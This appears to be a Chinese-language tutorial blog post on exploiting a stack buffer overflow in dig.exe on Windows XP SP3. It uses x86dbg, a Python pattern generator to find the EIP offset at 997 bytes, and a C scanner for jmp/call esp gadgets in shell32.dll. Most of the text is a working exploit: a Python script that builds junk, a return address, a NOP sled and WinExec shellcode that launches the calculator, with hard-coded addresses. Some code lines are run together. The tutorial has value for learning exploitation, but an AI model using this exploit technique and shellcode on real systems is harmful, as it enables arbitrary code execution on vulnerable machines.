- winXP SP3 环境 (xp环境默认没开启栈不可执行机制,比较方便破解,如果已开启了,请自行百度如何关闭)
- dig.exe 目标文件
- x86dbg调试工具
- python 环境
打开准备好的目标软件 dig.exe
映入眼帘的有两个输入框,可以直接从键盘获取输入
第一个输入框应该是输入域名的,TCP lookup按钮查询此域名的各种信息
猜想,这个输入框1 中输入的文本可能保存在栈区中的临时变量里,毕竟域名都不太长
直接在输入框里输入1100个 'A' 然后点击 TCP lookup 看看有什么现象
哈哈,软件崩溃退出了!!
-
使用x86dbg 加载运行 dig.exe ,再输入1100个有序字符
CH=65
ch=97
num_1=48 buf=''
n_C=0
n_c=0
n_1=0 for i in range(1100//3):
if n_1>9:
n_c+=1
n_1=0
if n_c > 25:
n_C+=1
n_c=0
buf += chr(CH+n_C)+chr(ch+n_c)+chr(num_1+n_1)
n_1+=1 print(buf) 把生成的字符串复制到输入框1 中,看看崩溃点在哪
-
这个eip是什么?肯定是我们输入的字符串的ASCII码
int main()
{
char str[10] = { 0 };
scanf_s("%x", (int)str);//输入eip的值
puts(str);
}哦,原来是'h2Bh'啊
-
在python 生成的字符串中找到'h2Bh'的位置
buf.find('h2Bh')
997,输入997个字符后字符串将覆盖eip
-
测试,运行计算器(当然你也可以是运行其他)
找到自己电脑中 WinExeC 函数的地址(方法自行百度)如果嫌麻烦,你可以自己写一个带有winexec函数的测试程序,用od看winexec函数的地址
-
找到程序中 jmp esp 或 call esp的指令
可以使用OllyUni.dll 这个OD插件寻找,不过寻找过程太慢,在我的测试中竟然运行了足足5分钟......这种时长不能忍!!!!
#include <windows.h>
#include <stdio.h>
#define DLL_NAME L"shell32.dll"
int main()
{
HINSTANCE handle = LoadLibrary(DLL_NAME);
if (!handle)
{
printf(" load dll erro !");
exit(0);
}
int address;
BYTE* ptr = (BYTE*)handle;
FILE *fp = fopen("shell32.txt", "w+");
fprintf(fp, "shell32.dll\t语句\t\t地址\t\t偏移\t\t基地址\n");
for (int position = 0; position < 12*1024*1024; position++)
{
if (ptr[position] == 0xFF)
{
if (ptr[position + 1] == 0xE4)
{
int address = (int)ptr + position;
fprintf(fp, "shell32.dll <jmp esp>\t%#x\t%#-8x\t%#x\n", address, position, ptr);
}
else if (ptr[position + 1] == 0xD4) //jmp esp
{
int address = (int)ptr + position;
fprintf(fp, "shell32.dll <call esp>\t%#x\t%#-8x\t%#x\n", address, position, ptr);
}
else{}
}
} fclose(fp);
return 0;
}
自己写个程序找shell32.dll中的指令
-
在eip后写程序,并且让他执行
# -*- coding: UTF-8 -*-
#我的电脑中 7C86250D kernel32.WinExec
import struct
junk = "A" * 997 #偏移 eip = '\x73\x15\xbf\x7d' #shell32.dll <call esp> 0x7dbf1573 nops = "\x90" * 10 #10字节NOP
fill = "\x43" * 10 #无用指令,测试时主要用于让自己看清shellcode结束了 #shellcode 要执行的代码
shellcode = "\x31\xC9" # xor ecx,ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x63\x61\x6C\x63" # push 0x636c6163
shellcode += "\x54" # push dword ptr esp
shellcode += "\xBB\x0D\x25\x86\x7C" # mov ebx,7C86250D
shellcode += "\xFF\xD3" # call ebx
#payload
payload = junk + eip + nops + shellcode+fill
#将payload写入到文件payload.txt
fp = open("payload.txt","w")
fp.write(payload)
fp.close()
print "[+]Exploit successfully!"
把生成的文件内容复制到 输入框1 中,是不是程序退出了,但计算器成功运行了?
或许这一步你成功了,但我还没有,为什么呢????因为系统原因,winexec函数的地址在我们的电脑中的位置是不一样的
-
#我的电脑中 7C86250D kernel32.WinExec
看没看到这个 7C86250D 中的 0D ?这是不会被输入到输入框的,输入框里并不是什么字符都可以被输入的,怎么办呢?这可是我电脑中winexec的地址啊!!!!
请注意 技术性的时刻即将到来了...
在x86dbg中直接输入 call 7C86250D 你会发现,咦?这机器码怎么与我输入的不一样呢?
因为人家使用的是相对 winexec 函数的地址
-
那么把自己的shellcode中也改成这样的地址不就好了!!
#shellcode 要执行的代码
shellcode = "\x31\xC9" # xor ecx,ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x63\x61\x6C\x63" # push 0x636c6163
shellcode += "\x54" # push dword ptr esp
shellcode += "\xe8\xd8\x25\xb1\x7b" #call winexec 这里啊,相对地址
'''
shellcode += "\xBB\x0D\x25\x86\x7C" # mov ebx,7C86250D
shellcode += "\xFF\xD3" # call ebx
'''
OMG,成功了!!
你可能会遇到的问题
- 你可能自己找 jmp esp 时的地址无法写入到 eip 中,要么是少了两位,要么是多了两们,不要气馁,你找到的地址不止一个 而是好几百个,可能这个地址中刚好有输入框中不可输入的字符,换个地址试试,如果不行,就再换
- 或许你在一开始就遇到的问题,复制的与字符串大部分都与 shellcode中的不一样,别着急,你试试把生成的字符串文件用 notpad++ 打开,或者 UltarEdit 会更好一些
- 遇到百度无法解决的问题,你还有最后两种强大的依靠,就是你的智慧与坚持